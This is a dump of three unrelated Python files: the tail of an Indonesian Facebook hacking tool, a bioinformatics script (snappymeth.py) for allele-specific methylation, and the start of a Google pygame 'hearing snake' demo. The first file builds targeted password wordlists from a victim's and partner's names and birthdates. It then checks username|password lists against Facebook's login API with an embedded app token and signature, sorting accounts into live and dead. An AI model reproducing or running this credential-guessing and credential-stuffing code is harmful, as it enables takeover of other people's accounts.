b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ')
c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ')
d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ')
e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
f = e[0:2]
g = e[2:4]
h = e[4:]
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v'
i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ')
j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ')
k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
l = k[0:2]
m = k[2:4]
n = k[4:]
file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
snappymeth.py
|
#! /usr/bin/env python
from __future__ import division
from __future__ import print_function
def main():
import argparse
import pysam
import vcf
from pyfasta import Fasta
import os
import tempfile
import re
import pandas
from collections import OrderedDict
from fisher import pvalue
import sys
import gzip
import csv
from IGV import IGV
from multiprocessing import Process, Queue
complement = {'A': 'T', 'C': 'G', 'G': 'C', 'T': 'A', 'N': 'N'}
def can_create_file(folder_path):
try:
tempfile.TemporaryFile(dir=folder_path)
return True
except OSError:
return False
def findCpGs(fafile, chrom, pos, distance):
minpos = 0 if pos<distance else pos-distance
sequence = fafile[chrom][minpos:pos+distance]
CpGs = [m.start() for m in re.finditer('CG', sequence, flags=re.IGNORECASE)]
return [x+minpos for x in CpGs]
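# For instance, findCpGs(fafile, 'chr1', 1000, 500) scans fafile['chr1'][500:1500] and
# returns the 0-based genomic start position of every 'CG' found (case-insensitive).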
def type_of_read(read):
# Work out where the methylation information is in the CpG site, and whether to complement it
# Depends on read1/read2 and forward/reverse status
if read.is_read1 and not read.is_reverse: # First, forward
offset = 0
to_complement = False
elif not read.is_read1 and read.is_reverse: # Second, reverse
offset = 0
to_complement = False
elif read.is_read1 and read.is_reverse: # First, reverse
offset = 1
to_complement = True
elif not read.is_read1 and not read.is_reverse: # Second, forward
offset = 1
to_complement = True
return offset, to_complement
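# The four branches above, summarized:
#   read1 + forward -> offset 0, keep the base as-is
#   read2 + reverse -> offset 0, keep the base as-is
#   read1 + reverse -> offset 1, complement the base
#   read2 + forward -> offset 1, complement the base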
def IGV_reader(queue):
## Read from the queue
while True:
msg = queue.get() # Read from the queue and do nothing
if (msg == 'DONE'):
break
chrom, pos, ref, alt, ref_filename, alt_filename = msg.split(",")
pos = int(pos)
png_filename = os.path.basename("%s.%s.%s.%s.%s.png" % (args.prefix, chrom, pos, ref, alt))
igv.load("file://"+os.path.abspath(ref_filename))
igv.load("file://"+os.path.abspath(alt_filename))
igv.go("%s:%s-%s" % (chrom, pos-250, pos+250))
igv.send("collapse")
igv.send("region %s %s %s" % (chrom, pos+1, pos+2)) # 1 based co-ordinates for IGV
igv.save(png_filename)
igv.clear()
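# Messages on the IGV queue are comma-separated 'chrom,pos,ref,alt,ref_bam,alt_bam'
# strings (produced in exportBAMs below); the sentinel string 'DONE' stops this reader.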
def exportBAMs(chrom, pos, ref, alt, minpos, maxpos, ref_readnames, alt_readnames):
ref_filename = "%s.%s.%s.ref.%s.bam" % (args.prefix, chrom, pos, ref)
ref_bam = pysam.AlignmentFile(ref_filename, "wb", template=samfile)
alt_filename = "%s.%s.%s.alt.%s.bam" % (args.prefix, chrom, pos, alt)
alt_bam = pysam.AlignmentFile(alt_filename, "wb", template=samfile)
for read in samfile.fetch(chrom, minpos, maxpos):
if read.query_name in ref_readnames:
ref_bam.write(read)
elif read.query_name in alt_readnames:
alt_bam.write(read)
ref_bam.close()
alt_bam.close()
pysam.index(ref_filename)
pysam.index(alt_filename)
if args.IGV_screenshot:
IGV_queue.put("%s,%s,%s,%s,%s,%s" % (chrom, pos, ref, alt, ref_filename, alt_filename))
def processReadsAtPosition(chrom, pos, ref, alt, CpGs, ref_readnames, alt_readnames, min_coverage,
min_region_CpGs):
# PASS 2 - iterate through the CpG sites around the SNP, and count C/Ts in REF/ALT in reads
CpGs_bases = pandas.DataFrame(OrderedDict([
('SNP.chr', chrom),
('SNP.pos', pos),
('SNP.ref', ref),
('SNP.alt', alt),
('CpG.pos', CpGs),
('ref.A', 0),
('ref.C', 0),
('ref.G', 0),
('ref.T', 0),
('ref.N', 0),
('alt.A', 0),
('alt.C', 0),
('alt.G', 0),
('alt.T', 0),
('alt.N', 0)]))
for read in samfile.fetch(chrom, CpGs[0]-1, CpGs[len(CpGs)-1]+1): # extra 1bp buffer
# Is this a REF, ALT or neither read?
if read.query_name in ref_readnames:
read_type = 'ref.'
elif read.query_name in alt_readnames:
read_type = 'alt.'
else:
read_type = None
if read_type is not None:
offset, to_complement = type_of_read(read)
# Iterate through all aligned read positions, and store methylation calls
for pair in read.get_aligned_pairs():
if pair[0] is not None and pair[1] is not None:
try:
i = CpGs.index(pair[1]-offset)
this_base = read.query_sequence[pair[0]]
if to_complement:
this_base = complement[this_base]
CpGs_bases.ix[i, read_type+this_base] += 1
except ValueError:
pass
# Subset to rows with minimum coverage
# Calculate coverage and methylation per CpG site
CpGs_bases["ref.cov"] = [CpGs_bases.loc[i, ["ref.C", "ref.T"]].sum() for i in CpGs_bases.index]
CpGs_bases["alt.cov"] = [CpGs_bases.loc[i, ["alt.C", "alt.T"]].sum() for i in CpGs_bases.index]
CpGs_bases = CpGs_bases[CpGs_bases["ref.cov"] >= min_coverage]
CpGs_bases = CpGs_bases[CpGs_bases["alt.cov"] >= min_coverage]
if len(CpGs_bases.index)>0: # If rows are left
CpGs_bases["ref.meth"] = [CpGs_bases["ref.C"][i] / CpGs_bases["ref.cov"][i] for i in CpGs_bases.index]
CpGs_bases["alt.meth"] = [CpGs_bases["alt.C"][i] / CpGs_bases["alt.cov"][i] for i in CpGs_bases.index]
CpGs_bases["meth.diff"] = [CpGs_bases["ref.meth"][i] - CpGs_bases["alt.meth"][i] for i in CpGs_bases.index]
# Calculate fisher pvalue per CpG site
CpGs_bases["pvalue"] = [pvalue(*CpGs_bases.loc[i, ["ref.C", "ref.T", "alt.C", "alt.T"]].tolist()).two_tail for i in CpGs_bases.index]
# Export sites table
CpGs_bases.to_csv(out_sites, header=False, index=False)
if len(CpGs_bases.index) >= min_region_CpGs: # If enough CpG sites remain, pool counts across the region, compute a fisher pvalue and export
output = "%s,%s,%s,%s,%s,%s,%s," % (
chrom, pos, ref, alt, # SNP position
CpGs_bases["CpG.pos"].tolist()[0], CpGs_bases["CpG.pos"].tolist()[-1], # First and last CpG sites of region
len(CpGs_bases.index)) # Number of CpG sites in region
# Sums of counts across the region
CpGs_sums = CpGs_bases[["ref.C", "ref.T", "alt.C", "alt.T", "ref.cov", "alt.cov"]].sum(0).tolist()
output += "%s,%s,%s,%s,%s,%s," % tuple(CpGs_sums)
# Methylation ratios and pvalue
ref_meth = CpGs_sums[0] / CpGs_sums[4]
alt_meth = CpGs_sums[1] / CpGs_sums[5]
meth_diff = ref_meth-alt_meth
p_value = pvalue(*CpGs_sums[0:4]).two_tail
output += "%s,%s,%s,%s\n" % (ref_meth, alt_meth, meth_diff, p_value)
# Export row for this region
out_regions.write(output)
# Export BAM per allele if feature is turned on and region meets fisher_cutoff
if args.region_bams and p_value <= args.fisher_cutoff:
print(" - Regional fisher exact p_value: %s - exporting BAMs" % p_value)
exportBAMs(chrom, pos, ref, alt, CpGs[0]-1, CpGs[len(CpGs)-1]+1,
ref_readnames, alt_readnames)
def processCpG(chrom, pos, cutoff_mapq, cutoff_baseq):
"""
Find readnames of all reads that are meth or unmeth at the specified CpG position
"""
M_readnames = set()
U_readnames = set()
n_mapq = 0
n_baseq = 0
for pileup in samfile.pileup(chrom, pos, pos+1):
if pileup.reference_pos == pos: # filter for position of interest
print("Processing %s reads covering CpG position %s:%s" % (
len(pileup.pileups), chrom, pos))
for read in pileup.pileups:
# read mapping quality filter
if read.alignment.mapping_quality >= cutoff_mapq:
n_mapq += 1
offset, to_complement = type_of_read(read.alignment)
if read.query_position + offset < len(read.alignment.query_sequence):
CpG_base = read.alignment.query_sequence[read.query_position + offset]
if to_complement:
CpG_base = complement[CpG_base]
CpG_qual = read.alignment.query_qualities[read.query_position + offset]
# base quality score filter @ SNP position
if CpG_qual >= cutoff_baseq:
n_baseq += 1
if CpG_base == "C":
M_readnames.add(read.alignment.query_name)
elif CpG_base == "T":
U_readnames.add(read.alignment.query_name)
print(" - Found %s reads passing mapping quality filter of %s" % (n_mapq, cutoff_mapq))
print(" - Found %s reads passing base quality filter of %s" % (n_baseq, cutoff_baseq))
print(" - Found %s reads with M allele" % len(M_readnames))
print(" - Found %s reads with U allele" % len(U_readnames))
# Remove reads in both
M_and_U = M_readnames.intersection(U_readnames)
if len(M_and_U) > 0:
print(" - %s reads discarded for being ambiguous" % len(M_and_U))
M_readnames = M_readnames.difference(M_and_U)
U_readnames = U_readnames.difference(M_and_U)
return M_readnames, U_readnames
def processSNP(chrom, pos, ref, alt, cutoff_mapq, cutoff_baseq):
"""
Find readnames of all reads with REF and ALT alleles
"""
ref_readnames = set()
alt_readnames = set()
n_mapq = 0
n_baseq = 0
for pileup in samfile.pileup(chrom, pos, pos+1):
if pileup.reference_pos == pos: # filter for position of interest
print("Processing %s reads covering SNP position %s:%s" % (
len(pileup.pileups), chrom, pos))
for read in pileup.pileups:
# read mapping quality filter
if read.alignment.mapping_quality >= cutoff_mapq:
n_mapq += 1
SNP_base = read.alignment.query_sequence[read.query_position]
SNP_qual = read.alignment.query_qualities[read.query_position]
# base quality score filter @ SNP position
if SNP_qual >= cutoff_baseq:
n_baseq += 1
if SNP_base == ref:
ref_readnames.add(read.alignment.query_name)
elif SNP_base == alt:
alt_readnames.add(read.alignment.query_name)
print(" - Found %s reads passing mapping quality filter of %s" % (n_mapq, cutoff_mapq))
print(" - Found %s reads passing base quality filter of %s" % (n_baseq, cutoff_baseq))
print(" - Found %s reads matching '%s' REF allele" % (len(ref_readnames), ref))
print(" - Found %s reads matching '%s' ALT allele" % (len(alt_readnames), alt))
# Remove reads in both
ref_and_alt = ref_readnames.intersection(alt_readnames)
if len(ref_and_alt) > 0:
print(" - %s reads discarded for being ambiguous" % len(ref_and_alt))
ref_readnames = ref_readnames.difference(ref_and_alt)
alt_readnames = alt_readnames.difference(ref_and_alt)
return ref_readnames, alt_readnames
## Entry point
parser = argparse.ArgumentParser(description="snappymeth.py - "
"Discover sites and regions of allele specific methylation from whole genome bisulfite "
"sequencing data by counting CpG methylation on alleles separately. Reads can be "
"separated by either a heterozygous SNP (when a VCF is supplied), or by the methylation "
"status of a single CpG site. Both analyses modes require sufficient sequencing coverage "
"of both alleles (default is 10x).")
parser.add_argument("input_file", help="Input VCF/CpG sites file, gzip compressed." )
parser.add_argument("input_bam", help="Input BAM file")
parser.add_argument("reference", help="Reference FASTA file")
parser.add_argument("prefix", help="Prefix for all output files - the sites and regions output csvs, "
"regional BAMs and IGV screenshots")
parser.add_argument("--input_type", choices=("VCF", "CpGs"), default="VCF", help="Whether the "
"input_file is a VCF (default) or a csv of methylation counts at CpG sites with the format "
"'chr,position,M,U' where the fields are chromosome name, 0-based position of the CpG site, "
"count of methylated bases sequenced at this site and count of unmethylated bases sequenced.")
parser.add_argument("--VCF_sample", default="0", help="The sample in the VCF to be processed - "
"either as the sample name or numeric index (0-based). Default is 0, the first sample.")
parser.add_argument("--pair_distance", type=int, default=500, help="The distance in "
"basepairs to search up and downstream from each position (default is 500).")
parser.add_argument("--max_depth", type=int, default=100, help="Maximum number "
"of reads allowed at a position to try and filter out repeat reads (default is 100)..")
parser.add_argument("--min_per_allele", type=int, default=5, help="Minimum number "
"of reads containing each allele to process a position.")
parser.add_argument("--min_sites_in_region", type=int, default=3, help="Minimum number "
"of CpG sites linked to a SNP to perform a regional analysis.")
parser.add_argument("--min_mapping_quality", type=int, default=40, help="Minimum mapping "
"quality score for a read to be considered.")
parser.add_argument("--min_base_quality", type=int, default=30, help="Minimum basecall "
"quality score at the SNP for a read to be considered.")
parser.add_argument("--region_bams", default=False, action='store_true', help="Specity to output "
"BAM files per allele when the regional fisher exact p-value is less than the cutoff "
"specified by --fisher_cutoff.")
parser.add_argument("--fisher_cutoff", type=float, default=0.0001, help="Regional fisher exact "
"p-value cutoff for a regional BAM to be created/IGV screenshot be taken (default is 0.0001).")
parser.add_argument("--IGV_screenshot", default=False, action='store_true', help="Specity to take "
"IGV screenshots of each region that passes --fisher_cutoff. Requires that IGV be running on "
"the local machine and listening on port 60151")
args = parser.parse_args()
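# Illustrative invocation only (file names and sample name are placeholders):
#   python snappymeth.py calls.vcf.gz sample.bam genome.fa out/sample \
#       --VCF_sample NA12878 --region_bams --fisher_cutoff 0.001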
# Check that the input files exist and that the output folder is writable
if not os.path.isfile(args.input_file):
print("Input file %s does not exist!" % args.input_file)
return
if not os.path.isfile(args.input_bam):
print("Input BAM file %s does not exist!" % args.input_bam)
return
if not os.path.isfile(args.reference):
print("Reference FASTA file %s does not exist!" % args.reference)
return
if not can_create_file(os.path.dirname(args.prefix)):
print("Output directory %s/ is not writable!" % os.path.dirname(args.prefix))
return
# Setup for IGV
if args.IGV_screenshot:
args.region_bams = True
igv = IGV()
igv.clear()
print("BAMs and IGV screenshots will be saved in %s" % os.path.dirname(os.path.abspath(args.prefix)))
igv.set_path(os.path.dirname(os.path.abspath(args.prefix)))
# Setup queue for IGV screenshots in separate process
print("Starting separate process for IGV screenshots")
IGV_queue = Queue()
reader_process = Process(target=IGV_reader, args=((IGV_queue),))
reader_process.daemon = True
reader_process.start() # Launch IGV_reader() as a separate python process
# Open the reference fasta file
print("Loading %s" % args.reference)
fafile = Fasta(args.reference)
# Index samfile if one does not already exist
samfile = pysam.AlignmentFile(args.input_bam, "rb")
if not samfile._hasIndex():
print("BAM file '%s' does not have an index, creating one..." % args.input_bam)
samfile.close()
pysam.index(args.input_bam)
samfile = pysam.AlignmentFile(args.input_bam, "rb")
# Open the output files and write headers
out_sites = open(args.prefix + ".sites.csv", "w")
out_sites.write("SNP.chr,SNP.pos,SNP.ref,SNP.alt,CpG.pos,ref.A,ref.C,ref.G,ref.T,ref.N,"
"alt.A,alt.C,alt.G,alt.T,alt.N,ref.cov,alt.cov,ref.meth,alt.meth,meth.diff,p.value\n")
out_regions = open(args.prefix + ".regions.csv", "w")
out_regions.write("SNP.chr,SNP.pos,SNP.ref,SNP.alt,first.CpG,last.CpG,nCG,ref.C,ref.T,alt.C,alt.T,"
"ref.cov,alt.cov,ref.meth,alt.meth,meth.diff,p.val\n")
if args.input_type=="VCF": # VCF analysis
# Open the VCF file
vcffile = vcf.Reader(filename=args.input_file, compressed=True)
# Check VCF_sample validity
if args.VCF_sample.isdigit(): # If a number convert to int
args.VCF_sample = int(args.VCF_sample)
if isinstance(args.VCF_sample, basestring):
try:
sample_no = vcffile.samples.index(args.VCF_sample)
except ValueError:
sys.exit("Sample %s not found in VCF!" % args.VCF_sample)
elif not args.VCF_sample < len(vcffile.samples):
sys.exit("Sample number %s not found in VCF!" % args.VCF_sample)
else:
sample_no = args.VCF_sample
print("Processing sample no %s (%s) from VCF" % (sample_no, vcffile.samples[sample_no]))
# Iterate through the VCF
for record in vcffile:
call = record.samples[sample_no]
if call.is_het:
n_ref = call['DP4'][0] + call['DP4'][1]
n_alt = call['DP4'][2] + call['DP4'][3]
if n_ref >= args.min_per_allele and n_alt >= args.min_per_allele and (n_ref + n_alt) <= args.max_depth:
# record.POS-1 as VCFs are 1 based and everything is 0 based
CpGs = findCpGs(fafile, record.CHROM, record.POS-1, args.pair_distance)
# If SNP overlaps a CpG site, remove
for site in range(record.POS-2, record.POS+1):
if site in CpGs:
CpGs.remove(site)
if len(CpGs) > 0: # If there are any CpG sites in the vicinity
ref_reads, alt_reads = processSNP(record.CHROM, record.POS-1, record.REF,
record.ALT[0].sequence, args.min_mapping_quality, args.min_base_quality)
if len(ref_reads) + len(alt_reads) <= args.max_depth:
processReadsAtPosition(record.CHROM, record.POS-1, record.REF,
record.ALT[0].sequence, CpGs, ref_reads, alt_reads, args.min_per_allele,
args.min_sites_in_region)
else: ## CpG sites analysis
with gzip.open(args.input_file, "r") as f:
CpGreader = csv.DictReader(f)
if CpGreader.fieldnames != ['chr', 'position', 'M', 'U']:
sys.exit("Field names in %s must be 'chr,position,M,U'" % args.input_file)
for CpG in CpGreader:
if int(CpG["M"]) >= args.min_per_allele and int(CpG["U"]) >= args.min_per_allele and (int(CpG["M"]) + int(CpG["U"])) <= args.max_depth:
CpGs = findCpGs(fafile, CpG["chr"], int(CpG["position"]), args.pair_distance)
try:
CpGs.remove(int(CpG["position"])) # Remove the CpG site we are processing
except ValueError:
sys.exit("Input file CpG site at '%s:%s' is a '%s' in reference. Are you sure your input file coordinates are 0-based?" % (CpG["chr"], CpG["position"], fafile[CpG["chr"]][int(CpG["position"]):int(CpG["position"])+2]))
if len(CpGs) > 0: # If there are any other CpG sites in the vicinity
M_reads, U_reads = processCpG(CpG["chr"], int(CpG["position"]),
args.min_mapping_quality, args.min_base_quality)
if len(M_reads) + len(U_reads) <= args.max_depth:
processReadsAtPosition(CpG["chr"], int(CpG["position"]), "M", "U", CpGs,
M_reads, U_reads, args.min_per_allele, args.min_sites_in_region)
# Close down IGV process
if args.IGV_screenshot:
IGV_queue.put("DONE")
print("Waiting for IGV screenshots process to finish")
reader_process.join()
# close files
samfile.close()
out_sites.close()
out_regions.close()
if __name__ == '__main__':
main()
|
run_hearing_snake.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import os
from random import randint
from threading import Thread
import time
import model
import pygame
from pygame.locals import *
import queue
APPLE_COLOR = pygame.Color('red')
SNAKE_COLOR = pygame.Color(32, 168, 0, 255)
GAMEOVER_TEXT_COLOR = pygame.Color('yellow')
GAMESTART_TEXT_COLOR = pygame.Color('yellow')
SCORE_TEXT_COLOR = pygame.Color('magenta')
NUMBER_OF_SCORES_TO_KEEP = 10
class Apple:
x = 0
y = 0
size = 30
step = size
color = APPLE_COLOR
_apple_image = None
_start_x = 5
_start_y = 5
_display_width = -1
_display_height = -1
def __init__(self, display_width, display_height):
self.x = self._start_x * self.step
self.y = self._start_y * self.step
self._display_width = display_width
self._display_height = display_height
self._apple_image = pygame.image.load(
'pygame_images/apple.png').convert_alpha()
def draw(self, surface):
if self._apple_image is not None:
surface.blit(self._apple_image, (self.x, self.y))
else:
pygame.draw.rect(surface, self.color,
(self.x, self.y, self.size, self.size), 0)
def respan(self):
# generate next apple position by keeping a border where we don't want
# the apple to appear
border = 2
width_bound = int(round(self._display_width / self.size)) - border
height_bound = int(round(self._display_height / self.size)) - border
self.x = randint(border, width_bound) * self.size
self.y = randint(border, height_bound) * self.size
class Player:
x = [0]
y = [0]
block_size = 30
step = block_size
color = SNAKE_COLOR
_direction = 0
length = 3
traveled_dist = 0
_display_width = -1
_display_height = -1
_snake_head_left = None
_snake_head_right = None
_snake_head_up = None
_snake_head_down = None
_snake_head_image_width = 0
_snake_head_image_height = 0
_snake_tail_left = None
_snake_tail_right = None
_snake_tail_up = None
_snake_tail_down = None
_update_count_max = 2
_update_count = 0
_need_immediate_pos_update = False
def __init__(self, length, display_width, display_height):
self._display_width = display_width
self._display_height = display_height
self._snake_head_right = pygame.image.load(
'pygame_images/snake_head_with_ears.png').convert_alpha()
self._snake_head_left = pygame.transform.rotate(self._snake_head_right, 180)
self._snake_head_up = pygame.transform.rotate(self._snake_head_right, 90)
self._snake_head_down = pygame.transform.rotate(self._snake_head_right, 270)
self._snake_tail_right = pygame.image.load(
'pygame_images/snake_tail.png').convert_alpha()
self._snake_tail_left = pygame.transform.rotate(self._snake_tail_right, 180)
self._snake_tail_up = pygame.transform.rotate(self._snake_tail_right, 90)
self._snake_tail_down = pygame.transform.rotate(self._snake_tail_right, 270)
self.restart(length)
def restart(self, length):
self.length = length
self._update_count = 0
self._direction = 0
self.x = [0]
self.y = [0]
for _ in range(0, 2000):
self.x.append(-100)
self.y.append(-100)
# initial positions, no collision.
self.x[1] = -1 * self.block_size
self.x[2] = -2 * self.block_size
self.y[1] = 0
